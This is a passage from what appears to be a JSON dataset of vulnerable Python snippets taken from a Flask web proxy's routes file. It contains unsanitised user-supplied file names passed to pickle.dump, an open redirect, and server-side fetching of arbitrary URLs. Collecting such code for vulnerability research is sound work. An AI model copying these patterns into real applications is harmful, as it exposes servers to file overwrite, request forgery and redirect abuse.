allow a user to easily load later\n if 'name' in request.args:\n pickle.dump(\n config_data,\n open(os.path.join(\n app.config['CONFIG_PATH'],\n request.args.get('name')), 'wb'))\n\n session['config'] = config_data\n return redirect(config_data['url'])\n else:\n return redirect(url_for('.index'), code=403)"}, {"id": "vul_py_189_2", "commit": "8830615", "file_path": "app/routes.py", "start_line": 465, "end_line": 490, "snippet": "def element():\n element_url = src_url = request.args.get('url')\n if element_url.startswith('gAAAAA'):\n try:\n cipher_suite = Fernet(g.session_key)\n src_url = cipher_suite.decrypt(element_url.encode()).decode()\n except (InvalidSignature, InvalidToken) as e:\n return render_template(\n 'error.html',\n error_message=str(e)), 401\n\n src_type = request.args.get('type')\n\n try:\n file_data = g.user_request.send(base_url=src_url).content\n tmp_mem = io.BytesIO()\n tmp_mem.write(file_data)\n tmp_mem.seek(0)\n\n return send_file(tmp_mem, mimetype=src_type)\n except exceptions.RequestException:\n pass\n\n empty_gif = base64.b64decode(\n 'R0lGODlhAQABAIAAAP///////yH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==')\n return send_file(io.BytesIO(empty_gif), mimetype='image/gif')"}, {"id": "vul_py_189_3", "commit": "8830615", "file_path": "app/routes.py", "start_line": 496, "end_line": 557, "snippet": "def window():\n target_url = request.args.get('location')\n if target_url.startswith('gAAAAA'):\n cipher_suite = Fernet(g.session_key)\n target_url = cipher_suite.decrypt(target_url.encode()).decode()\n\n content_filter = Filter(\n g.session_key,\n root_url=request.url_root,\n config=g.user_config)\n target = urlparse.urlparse(target_url)\n host_url = f'{target.scheme}://{target.netloc}'\n\n get_body = g.user_request.send(base_url=target_url).text\n\n results = bsoup(get_body, 'html.parser')\n src_attrs = ['src', 'href', 'srcset', 'data-srcset', 'data-src']\n\n # Parse HTML response and replace relative links w/ absolute\n for element in results.find_all():\n for attr in src_attrs:\n if not element.has_attr(attr) or not element[attr].startswith('/'):\n continue\n\n element[attr] = host_url + element[attr]\n\n # Replace or remove javascript sources\n for script in results.find_all('script', {'src': True}):\n if 'nojs' in request.args:\n script.decompose()\n else:\n content_filter.update_element_src(script, 'application/javascript')\n\n # Replace all possible image attributes\n img_sources = ['src', 'data-src', 'data-srcset', 'srcset']\n for img in results.find_all('img'):\n _ = [\n content_filter.update_element_src(img, 'image/png', attr=_)\n for _ in img_sources if img.has_attr(_)\n ]\n\n # Replace all stylesheet sources\n for link in results.find_all('link', {'href': True}):\n content_filter.update_element_src(link, 'text/css', attr='href')\n\n # Use anonymous view for all links on page\n for a in results.find_all('a', {'href': True}):\n a['href'] = f'{Endpoint.window}?location=' + a['href'] + (\n '&nojs=1' if 'nojs' in request.args else '')\n\n # Remove all iframes -- these are commonly used inside of